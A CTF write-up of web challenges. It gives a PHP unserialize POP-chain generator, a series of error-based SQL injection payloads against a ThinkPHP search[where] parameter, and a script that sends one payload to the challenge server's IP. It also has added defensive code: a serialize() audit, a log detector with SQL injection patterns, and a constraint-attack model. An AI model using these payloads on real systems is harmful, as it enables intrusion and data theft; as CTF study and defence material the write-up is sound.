Anheng January Monthly CTF

Write-up reproducing the Anheng January monthly CTF challenges

Web

babygo

babygo (submit the md5 of the string you find)

Challenge source

<?php  
@error_reporting(1);
include 'flag.php';
class baby
{
    protected $skyobj;
    public $aaa;
    public $bbb;
    function __construct()
    {
        $this->skyobj = new sec;
    }
    function __toString()
    {
        if (isset($this->skyobj))
            return $this->skyobj->read();
    }
}

class cool
{
    public $filename;
    public $nice;
    public $amzing;
    function read()
    {
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "you must be joking!";
            }
        }
    }
}

class sec
{
    function read()
    {
        return "it's so sec~~";
    }
}

if (isset($_GET['data']))
{
    $Input_data = unserialize($_GET['data']);
    echo $Input_data;
}
else
{
    highlight_file("./index.php");
}
?>

Feels like a challenge set by 一叶飘零 2333... still learned something from it.

This challenge is about PHP object injection. @l3m0n's post, php对象注入-pop链的构造 (PHP object injection: building a POP chain), explains it well; the other CSDN blogs on the topic are frankly awful. The key point is that unserialize() lets you control a class's properties, whether they are private or public. So we can simply generate the payload we need locally.

As shown below: change the line in __construct to $this->skyobj = new cool; so that cool->read() gets called, then use $this->amazing = NULL; to pass the $this->nice->aaa === $this->nice->bbb check. Actually you don't even need to set it, since both sides are NULL anyway. That's the whole challenge.

<?php  
// @error_reporting(1);
// include 'flag.php';
class baby
{
    protected $skyobj;
    public $aaa;
    public $bbb;
    function __construct()
    {
        $this->skyobj = new cool;   // swap sec for cool so __toString() reaches cool::read()
        $this->amazing = NULL;      // redundant, as noted above: the compared properties are NULL anyway
    }
    function __toString()
    {
        if (isset($this->skyobj))
            return $this->skyobj->read();
    }
}

class cool
{
    public $filename = "flag.php";  // the file cool::read() returns
    public $nice;
    public $amzing;
    function read()
    {
        echo "Nice!";
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "you must be joking!";
            }
        }
    }
}

class sec
{
    function read()
    {
        return "it's so sec~~";
    }
}

$obj = new baby;
echo urlencode(serialize($obj));   // the output goes into the data parameter
// $obj->aaa->amazing = new baby;

// if (isset($_GET['data']))
// {
// $Input_data = unserialize($_GET['data']);
// echo $Input_data;
// }
// else
// {
// highlight_file("./test.php");
// }
?>
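
The point made above, that a serialized payload chooses the class and sets every property with protected and private ones marked only by a NUL-byte prefix in the key, is easy to see with a parser for the format. The following is an added example and not code from the write-up: a minimal parser for PHP serialize() output plus an audit pass that reports classes outside an allow-list and non-public properties being set, and that also looks inside strings for a second serialized object (the nested unserialize() in cool::read()). The sample payload is constructed to match the shape the generator script above prints before urlencode(); the allow-list and rule names are assumptions. Only ASCII payloads are handled, since PHP counts string lengths in bytes.

```python
"""Minimal parser and audit for PHP serialize() output (added example)."""


class PhpUnserializeError(ValueError):
    """Raised when the payload is not well-formed serialize() output."""


class PhpObject:
    """A decoded O:...: entry: class name plus the raw (still mangled) property map."""
    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def _length_prefixed(s, i):
    """Read the digits at offset i up to ':'; return (number, offset after ':')."""
    colon = s.index(':', i)
    return int(s[i:colon]), colon + 1


def _parse(s, i):
    """Parse one value at offset i; return (value, offset just past it)."""
    t = s[i]
    if t == 'N':                                   # N;
        return None, i + 2
    if t in 'bid':                                 # b:1;  i:42;  d:1.5;
        end = s.index(';', i)
        raw = s[i + 2:end]
        return {'b': lambda r: r == '1', 'i': int, 'd': float}[t](raw), end + 1
    if t == 's':                                   # s:5:"hello";
        length, j = _length_prefixed(s, i + 2)     # j points at the opening quote
        val = s[j + 1:j + 1 + length]
        if s[j + 1 + length:j + 3 + length] != '";':
            raise PhpUnserializeError('bad string at offset %d' % i)
        return val, j + 3 + length
    if t in 'aO':                                  # a:2:{...}  O:4:"baby":2:{...}
        name = None
        if t == 'O':
            name_len, j = _length_prefixed(s, i + 2)
            name = s[j + 1:j + 1 + name_len]
            j = j + 1 + name_len + 2               # skip closing quote and ':'
        else:
            j = i + 2
        count, j = _length_prefixed(s, j)          # j now points at '{'
        j += 1
        items = {}
        for _ in range(count):
            k, j = _parse(s, j)
            v, j = _parse(s, j)
            items[k] = v
        if s[j] != '}':
            raise PhpUnserializeError('bad container at offset %d' % i)
        return (PhpObject(name, items) if t == 'O' else items), j + 1
    raise PhpUnserializeError('unsupported type %r at offset %d' % (t, i))


def parse_php(payload):
    """Parse a whole payload; reject trailing data."""
    value, end = _parse(payload, 0)
    if end != len(payload):
        raise PhpUnserializeError('trailing data after offset %d' % end)
    return value


def demangle(name):
    """Undo PHP's property-name mangling; return (visibility, plain_name)."""
    if name.startswith('\0*\0'):                   # "\0*\0prop" -> protected
        return 'protected', name[3:]
    if name.startswith('\0'):                      # "\0Class\0prop" -> private
        return 'private', name[1:].split('\0', 1)[1]
    return 'public', name


def audit(payload, allowed_classes):
    """Return (rule, detail) findings; an empty list means only allowed classes
    are instantiated and only public properties are set."""
    findings = []

    def walk(v):
        if isinstance(v, PhpObject):
            if v.cls not in allowed_classes:
                findings.append(('class-not-allowed', v.cls))
            for key, pv in v.props.items():
                vis, name = demangle(key) if isinstance(key, str) else ('public', str(key))
                if vis != 'public':
                    findings.append((vis + '-property-set', '%s::%s' % (v.cls, name)))
                walk(pv)
        elif isinstance(v, dict):
            for pv in v.values():
                walk(pv)
        elif isinstance(v, str) and v[:2] in ('O:', 'a:'):
            try:                                   # a string that is itself serialize()
                walk(parse_php(v))                 # output, destined for a 2nd unserialize()
            except (PhpUnserializeError, ValueError, IndexError):
                pass

    walk(parse_php(payload))
    return findings


# Constructed sample: baby -> protected skyobj = cool(filename="flag.php"),
# matching the shape of the generator script's output before urlencode().
SAMPLE = ('O:4:"baby":4:{s:9:"\0*\0skyobj";O:4:"cool":3:{s:8:"filename";s:8:"flag.php";'
          's:4:"nice";N;s:6:"amzing";N;}s:3:"aaa";N;s:3:"bbb";N;s:7:"amazing";N;}')

if __name__ == '__main__':
    for rule, detail in audit(SAMPLE, {'baby', 'sec'}):
        print(rule, detail)
```

Run against the sample with an allow-list of {baby, sec}, the audit reports both that the protected skyobj property is being set from outside and that a class the application never intended to unserialize (cool) is being instantiated; the same check in front of unserialize() (or PHP's own allowed_classes option) is what turns this chain into a harmless __PHP_Incomplete_Class.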

Simple php

Visiting robots.txt reveals an admin backend

User-agent: *

Disallow: /ebooks
Disallow: /admin
Disallow: /xhtml/?
Disallow: /center

Visiting /admin and logging in with admin/12345678 succeeds; after login there is a search function.

Combining this with the known ThinkPHP 3.2 framework vulnerability on the page, the following payloads were used step by step to get the flag

search[where]=3 and 1=updatexml(1,concat(0x7,(select schema_name from information_schema.schemata limit 3,1),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select group_concat(table_name) from information_schema.tables where table_schema='tpctf'),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select group_concat(flag) from flag),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select flag from flag limit 0,1),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x3a,(select flag from flag limit 0,1)),1);%23

search[where]=3 and extractvalue(1,concat(0x5c,(select flag from flag limit 0,1)));%23

search[where]=3 and (select 1 from (select count(*),concat((select (select (select flag from flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);%23


search[where]=3 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7,flag,0x7e) FROM flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);%23

select 1 from(select count(*),concat((select (select (SELECT concat(0x7,flag,0x7e) FROM flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a

The submission turned out to be wrong. Looking at other people's write-ups, one character was missing; after searching around, the output is apparently length-limited.

I tried a lot of things, including floor()-based error injection, which does not truncate the output; it worked locally but just hung (pending) against the server, which was very frustrating. In the end substr(str,32,1) gave me the last character, 6.

search[where]=3 and extractvalue(1,concat(0x5c,substr((select flag from flag limit 0,1),32,1)));%23

Here's the script:

import HackRequests as hack
url = "http://101.71.29.5:10010/Admin/User/Index?search[where]=3%20and%20extractvalue(1,concat(0x5c,substr((select%20flag%20from%20flag%20limit%200,1),32,1)));%23"
loginurl = "http://101.71.29.5:10010/admin/index/login"
# hh = hack.httpraw(raw)
header = '''
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Cookie: PHPSESSID=6qm8l5phgs6hkva4fpndkp1p70; path=/
'''
proxy = ('185.32.44.22','80')
user = "user=admin&password=12345678"
# hh = hack.http(loginurl,headers=header,proxy=proxy,post=user)
hh = hack.http(url,headers=header,proxy=proxy)
print(hh.header)
print(hh.text())
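
From the defending side, every request in the sequence above leaves the same fingerprint in the web server's access log: a ThinkPHP-style array key that carries a raw condition (search[where]), one of the MySQL functions that leak data through error text (updatexml and extractvalue, whose XPATH error message is capped at 32 characters, which is the truncation the author ran into, or the floor(rand(0)*2) GROUP BY trick), a read of information_schema, and a trailing comment. The following detector is an added example, not part of the write-up: it URL-decodes each query string repeatedly so double encoding does not hide anything, then matches those patterns. The log format, the sample lines (the first three mirror the payloads above, the last two are benign) and the rule names are constructed for the example; treating a key ending in [where] as a raw-condition parameter is an assumption about ThinkPHP 3.2 style controllers.

```python
"""Access-log detector for error-based SQL injection (added example)."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines in the common log format.
SAMPLE_LOG = r'''
10.0.0.5 - - [10/Jan/2019:21:03:11 +0800] "GET /Admin/User/Index?search%5Bwhere%5D=3%20and%20extractvalue(1,concat(0x5c,substr((select%20flag%20from%20flag%20limit%200,1),32,1)));%23 HTTP/1.1" 200 1532
10.0.0.5 - - [10/Jan/2019:21:03:12 +0800] "GET /Admin/User/Index?search%5Bwhere%5D=3%20and%201=updatexml(1,concat(0x7e,(select%20schema_name%20from%20information_schema.schemata%20limit%203,1),0x7e),1);%23 HTTP/1.1" 200 1540
10.0.0.5 - - [10/Jan/2019:21:03:13 +0800] "GET /Admin/User/Index?search%255Bwhere%255D=3%2520and(select%25201%2520from(select%2520count(*),concat((select%2520flag%2520from%2520flag%2520limit%25200,1),floor(rand(0)*2))x%2520from%2520information_schema.tables%2520group%2520by%2520x)a);%2523 HTTP/1.1" 200 1540
10.0.0.9 - - [10/Jan/2019:21:04:01 +0800] "GET /Admin/User/Index?search%5Bname%5D=alice HTTP/1.1" 200 2210
10.0.0.9 - - [10/Jan/2019:21:04:02 +0800] "GET /index.php?page=about HTTP/1.1" 200 800
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$')

# Each rule is applied to a fully decoded parameter value.
RULES = [
    ('mysql-error-based-xml', re.compile(r'\b(updatexml|extractvalue)\s*\(', re.I)),
    ('mysql-error-based-floor', re.compile(r'floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)', re.I)),
    ('information-schema-read', re.compile(r'\binformation_schema\.', re.I)),
    ('sql-comment-terminator', re.compile(r'(#|--\s|/\*)\s*$')),
]
# Assumption: a ThinkPHP 3.2 style controller passes search[...] straight to where().
RAW_WHERE_KEY = re.compile(r'\[where\]$', re.I)


def decode_fully(s, rounds=3):
    """Percent-decode until the text stops changing (defeats double encoding)."""
    for _ in range(rounds):
        d = unquote_plus(s)
        if d == s:
            break
        s = d
    return s


def parse_query(query):
    """Split on '&' before decoding, so an encoded '&' or ';' cannot split a value."""
    pairs = []
    for part in query.split('&'):
        if part:
            key, _, value = part.partition('=')
            pairs.append((decode_fully(key), decode_fully(value)))
    return pairs


def analyse_line(line):
    """Return a dict with the matched rule names for one log line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    hits = set()
    for key, value in parse_query(parts.query):
        if RAW_WHERE_KEY.search(key):
            hits.add('raw-where-parameter:' + key)
        for name, rx in RULES:
            if rx.search(value):
                hits.add(name)
    return {'ip': m.group('ip'), 'time': m.group('ts'), 'path': parts.path, 'hits': sorted(hits)}


def scan_log(text):
    """Return the analysed records for every line that triggered at least one rule."""
    alerts = []
    for line in text.strip().splitlines():
        r = analyse_line(line)
        if r and r['hits']:
            alerts.append(r)
    return alerts


if __name__ == '__main__':
    for a in scan_log(SAMPLE_LOG):
        print(a['time'], a['ip'], a['path'], ', '.join(a['hits']))
```

Splitting the query on '&' before decoding matters: decoding first would let a '%26' inside a payload masquerade as a parameter separator. The detector is deliberately stateless; in practice the raw-where-parameter hit alone, regardless of the value, is the signal that the controller hands user-controlled array keys to the ORM, which is the actual fix to make.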

By the way, I saw in other people's write-ups that the admin login was done via a SQL constraint attack... not a weak password. My guess is that the SQL statement is something like

select * from users where username = "xxx" and password = "xxx"

And if the registration password is 8 digits, someone must have picked 12345678... 2333
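
The constraint attack the author mentions rests on two MySQL behaviours: in non-strict sql_mode an INSERT value longer than the column is silently truncated to the column width (a warning, not an error), and under a PAD SPACE collation '=' on CHAR/VARCHAR ignores trailing spaces, so a registered 'admin' followed by spaces and a junk character is stored as 'admin' plus spaces and later satisfies WHERE username = 'admin' with the registrant's password. The following is an added example, not from the write-up: a plain-Python model of that table that shows the login going through in the permissive configuration, and being refused once strict mode (STRICT_TRANS_TABLES), a UNIQUE index on username, or an application-side length check is in place. The schema, column width, accounts and passwords are constructed for the demonstration.

```python
"""Model of MySQL truncation + PAD SPACE comparison behind the constraint attack,
with the settings that stop it (added example)."""

USERNAME_WIDTH = 20            # assumed schema: username VARCHAR(20)


class DataTooLong(Exception):
    """Stands in for MySQL error 1406 (strict mode rejects over-long values)."""


class DuplicateEntry(Exception):
    """Stands in for MySQL error 1062 (UNIQUE index violation)."""


def pad_space_equal(a, b):
    """'=' under a PAD SPACE collation: trailing spaces are insignificant."""
    return a.rstrip(' ') == b.rstrip(' ')


class UsersTable:
    def __init__(self, strict_mode, unique_username):
        self.strict_mode = strict_mode
        self.unique_username = unique_username
        self.rows = []

    def insert(self, username, password):
        if len(username) > USERNAME_WIDTH:
            if self.strict_mode:
                raise DataTooLong("Data too long for column 'username'")
            username = username[:USERNAME_WIDTH]        # silent truncation + warning
        if self.unique_username and any(pad_space_equal(r['username'], username) for r in self.rows):
            raise DuplicateEntry("Duplicate entry for key 'username'")
        self.rows.append({'username': username, 'password': password})

    def login(self, username, password):
        """SELECT * FROM users WHERE username = ? AND password = ?"""
        for r in self.rows:
            if pad_space_equal(r['username'], username) and r['password'] == password:
                return r
        return None


def register_and_login(strict_mode, unique_username, app_length_check=False):
    """Run the scenario once: a legitimate admin exists, a second registration
    uses an over-long 'admin' username, then a login as admin is attempted with
    the second registration's password. Returns what happened."""
    users = UsersTable(strict_mode, unique_username)
    users.insert('admin', 'correct-horse-battery')        # legitimate account (constructed)
    crafted = 'admin' + ' ' * (USERNAME_WIDTH - 5) + 'x'  # 21 characters (constructed)
    if app_length_check and len(crafted) > USERNAME_WIDTH:
        return {'registered': False, 'reason': 'rejected by application length check', 'login_ok': False}
    try:
        users.insert(crafted, '12345678')
    except (DataTooLong, DuplicateEntry) as e:
        return {'registered': False, 'reason': str(e), 'login_ok': False}
    row = users.login('admin', '12345678')
    return {'registered': True, 'reason': '', 'login_ok': row is not None}


if __name__ == '__main__':
    print('permissive :', register_and_login(False, False))
    print('strict mode:', register_and_login(True, False))
    print('unique idx :', register_and_login(False, True))
    print('app check  :', register_and_login(False, False, app_length_check=True))
```

Note that the UNIQUE index catches the duplicate even without strict mode, because the index compares under the same PAD SPACE rule that makes the login match; the cheapest application-side fix is to validate the username length before the INSERT and to compare the stored username to the submitted one exactly after SELECT.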
